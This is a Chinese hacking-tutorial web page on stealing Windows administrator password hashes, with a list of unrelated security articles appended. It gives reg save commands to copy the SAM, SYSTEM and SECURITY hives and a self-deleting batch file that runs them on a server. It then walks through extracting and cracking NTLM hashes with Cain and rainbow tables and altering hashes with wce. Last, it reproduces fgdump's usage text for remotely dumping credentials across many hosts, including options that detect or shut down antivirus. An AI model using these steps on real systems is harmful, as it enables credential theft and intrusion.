抓取管理员hash值(哈希)的另类方法

所属分类: 网络安全 / 黑客教程 阅读数: 92
收藏 0 赞 0 分享
今天抓hash的时候发现GetHashes.exe不好使..另外又测试了几个也都不好用...
不同版本的Windows的hash获取方法不一样.
用到的工具有pwdump7.exe、GetHashes.exe、SAMInside.exe、LC5、Cain、Proactive Password Auditor、Ophcrack.
 于是百度了一些资料穿上来!希望大家能学习一下。
 ====================================第1种===========================================
 使用工具 cain、cmd、wce1.2等
 首先使用通用方法抓取HASH
 使用命令先保存一份需要的信息。
 reg save hklm\sam sam.hive
 reg save hklm\system system.hive
 reg save hklm\security security.hive
 (这三个文件我找了个批处理,这样比较方便)
 ==========================
 @echo off
reg save hklm\sam sam.hive
reg save hklm\system system.hive
reg save hklm\security security.hive
del %0
 ===========================
 保存为批处理文件,直接在服务器上运行。
 就会在批处理所在目录生成这三个文件
 和下面的效果一样,只不过简化了步骤
\
然后我们使用CAIN打开保存到的system.hive 和security.hive两个文件。我是在虚拟机里面操作就直接在虚拟机里面搞了。。大家在服务器上搞可以下载到本地。
 打开CAIN选择LSA Secrets然后打开system.hive 和security.hive两个文件
\
加载后我们可以看到一些信息,这些信息可能会有明文密码,我这里是没有的。
\
如果没有我们就需要抓HASH了。点击CAIN的Cracker选项卡,加载sam.hive文件。
\
\
拿到HASH了,www.jb51.net 下面就是破解,用工具自带的破解试试密码出来了,我设置的123456
\
我们也可以使用彩虹表来破解
下面我们使用wce来搞。。这个工具是渗透利器哈~~具体介绍大家自己百度去。
\
从帮助来看我们可以使用-l参数查看NTML hash
 我们还可以用-s参数来改HASH值如图
\
从图中我们可以看到最后一位的HASH我从4修改到了5
\
====================================第2种===========================================
fgdump 可以远程抓Hash的工具
 作者:TheLostMind
一直都是本地抓,今天上SamInside论坛看到一个开源的工具,fgdump,可以远程抓。
 http://swamp.foofus.net/fizzgig/fgdump/fgdump-usage.htm
 fgDump 2.1.0 - fizzgig and the mighty group at foofus.net
Written to make j0m0kun's life just a bit easier
Copyright(C) 2008 fizzgig and foofus.net
fgdump comes with ABSOLUTELY NO WARRANTY!
This is free software, and you are welcome to redistribute it
under certain conditions; see the COPYING and README files for
more information.
Usage:
fgdump [-?][-t][-c][-w][-s][-r][-v][-k][-o][-a][-O 32|64][-l logfile][-T threads] [{{-h Host | -f filename} -u Username -p Password | -H filename}]
where Username and Password have administrator credentials
-? displays help (you're looking at it!)
-t will test for the presence of antivirus without actually running the password dumps
-c skips the cache dump
-w skips the password dump
-s performs the protected storage dump
-r forgets about existing pwdump/cachedump files. The default behavior is to skip a host if these files already exist.
-v makes output more verbose. Use twice for greater effect
-k keeps the pwdump/cachedump going even if antivirus is in an unknown state
-l logs all output to logfile
-T runs fgdump with the specified number of parallel threads
-h is the name of the single host to perform the dumps against
-f reads hosts from a line-separated file
-H reads host:username:password from a line-separated file (per-host credentials)
-o skips pwdump history dumps
-a will not attempt to detect or shut down antivirus, even if it is present
 -O manually sets whether the target is a 32- or 64-bit OS. Note that this applies to all hosts specified.
** As of version 1.4.0, you can run fgdump with no parameters to dump the local box (no impersonation or binding)
测试了一下,很不错,简单翻译了一下帮助。
 用法:
fgdump [-?][-t][-c][-w][-s][-r][-v][-k][-o][-a][-O 32|64][-l logfile][-T threads] [{{-h Host | -f filename} -u
 Username -p Password | -H filename}]
 用户名和密码要求要有管理员资格
 -? 显示帮助
-t 测试当前的杀毒软件,并不是真正的转储密码
-c 跳过缓存转储
-w 跳过密码转储
-s 执行保护存贮转储
-r 忽略现存的pwdump/cachedump文件。默认的行为是跳过存在这些文件的主机。
-v 详细输出. 使用两次能获得更为详细的输出
-k 即使不知道杀毒软件的状态也继续执行pwdump/cachedump(进行密码转储)
-l 记录所有输出到日志文件
-T 使用指定数量的线程执行此程序
-h 需要执行密码转储的单个目标主机
-f 从用行分隔的文件中读取主机列表
-H 从用行分隔的文件中读取 主机名:用户名:密码
-o 跳过转储历史密码
-a 试图检测或关闭杀毒软件,即使杀毒软件正在运行
 -O 手工设置远程主机是32位操作系统还是64位操作系统。 注意:这项操作应用到所有指定的主机。
 ** 使用1.4.0,你可以直接运行此程序,不需要带参数,来转储本机密码
更多精彩内容其他人还在看

winXP/win7/win10系统关闭445端口的方法(电脑勒索病毒预防)

这篇文章主要介绍了电脑勒索病毒如何预防winXP/win7/win10系统关闭445端口的方法的相关资料,需要的朋友可以参考下
收藏 0 赞 0 分享

“永恒之蓝”(Wannacry)蠕虫全球肆虐 安装补丁的方法

5月12日晚,一款名为Wannacry的蠕虫勒索软件袭击全球网络,这被认为是迄今为止最巨大的勒索交费活动,影响到近百个国家上千家企业及公共组织。该软件被认为是一种蠕虫变种(也被称为“wannacryptor”或“wcry”)
收藏 0 赞 0 分享

WannaCry病毒劫持文件怎么恢复?阿里云云盾勒索病毒文件恢复的使用教程

名为WannaCry的勒索病毒让全球数十万Windows计算机中招,重要文件被实施加密,并索要赎金解锁,现在阿里云安全团队开放勒索病毒“一键解密和修复”工具,恢复已被WannaCry勒索病毒加密的文件,下面就来看看具体的操作方法吧
收藏 0 赞 0 分享

极虎病毒是什么 极虎病毒有什么危害

极虎病毒是金山毒霸云安全实验室国内首家发现的一款集合了磁碟机、AV终结者、中华吸血鬼、猫癣下载器为一体的混合病毒,由于该病毒可利用IE极光ODAY漏洞进行传播,又是虎年的第一个重大恶性病毒,因此得名“极虎”
收藏 0 赞 0 分享

全国各地敲响网络安全警钟 河南企业如何应对?

近日,很多人的朋友圈都被“重庆网安总队查处某公司违反《网络安全法》第一案”刷屏了,不知道接下来又有哪家企业“中招”?紧接着,即将召开的十九大也会进一步加大对网络信息安全的监管力度,这些都给河南省乃至全国企事业单位的网络信息安全工作敲响了警钟
收藏 0 赞 0 分享

网络安全基础问答25例,白帽黑客和安全研究员必备!

这篇文章主要为大家介绍了网络安全基础,入门必看,对于想学习网络安全的朋友必须要了解的东西
收藏 0 赞 0 分享

有什么有效的方法能禁止员工将公司电脑中的文件拷贝出去、禁止员工复制公司电脑文件

这篇文章主要介绍了有什么有效的方法能禁止员工将公司电脑中的文件拷贝出去、禁止员工复制公司电脑文件的相关资料,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
收藏 0 赞 0 分享

如何禁止外来电脑访问共享文件、如何禁止手机访问共享文件

为了日常工作方便,设置共享文件服务器通常是大多数企业的管理方式,共享文件服务器上的共享文件仅用于局域网内的用户使用,本文给大家介绍如何禁止外来电脑访问共享文件、如何禁止手机访问共享文件,需要的朋友参考下吧
收藏 0 赞 0 分享

安装大势至电脑文件防泄密系统客户端提示“用户/密码错误”怎么解决

这篇文章主要介绍了安装大势至电脑文件防泄密系统客户端提示“用户/密码错误”怎么解决的相关资料,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
收藏 0 赞 0 分享

大势至电脑文件防泄密系统的比较优势,专业的电脑数据防泄漏软件

这篇文章主要介绍了大势至电脑文件防泄密系统的比较优势,专业的电脑数据防泄漏软件的相关资料,大势至电脑文件防泄密系统主要从三个方面进行控制,即存储设备控制、上网行为控制、操作系统控制,从而构建立体化、全方位信息安全防护平台
收藏 0 赞 0 分享
查看更多